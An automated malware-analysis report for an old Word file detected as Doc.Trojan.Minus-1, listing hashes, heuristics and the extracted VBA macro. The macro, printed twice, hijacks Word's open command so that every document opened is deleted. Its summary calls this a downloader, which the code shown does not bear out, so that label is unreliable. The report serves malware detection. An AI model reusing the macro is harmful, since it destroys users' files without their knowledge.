Office (OLE) malware analysis — malicious · b3aeaf26ac8dc189

MALICIOUS

Office (OLE)

25.0 KB Created: 2001-02-23 18:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: a9390434280968ad761ab4ac3e6a32e0 SHA-1: 078ca3c658348f29e676fcb07772bbc3edb98396 SHA-256: b3aeaf26ac8dc1890b2e152fbdee790ea8d41e519ae162d77dd3f4b8fd8bbcb7

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The macro attempts to write to the registry key HKEY_CLASSES_ROOT\Word.Document.8\shell\Open\ddeexec, likely to establish a mechanism for executing further malicious code. This behavior is consistent with a macro-based downloader.

Heuristics 3

ClamAV: Doc.Trojan.Minus-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Minus-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 547 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	547 bytes
SHA-256: `3e871dfa72ad78e692d1ea97cc54bb93bab381035db7b44754ce9d748a3572bf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open(): System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8\shell\Open\ddeexec", "") = "['DDE-Bacteria][On Error Resume Next][Kill(""%1"")]": End Sub 'VOVAN//SMF

SHA-256: 3e871dfa72ad78e692d1ea97cc54bb93bab381035db7b44754ce9d748a3572bf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
                                                                                                    Private Sub Document_Open(): System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8\shell\Open\ddeexec", "") = "['DDE-Bacteria][On Error Resume Next][Kill(""%1"")]": End Sub 'VOVAN//SMF

Open this report in the interactive analyzer, or submit your own file for analysis.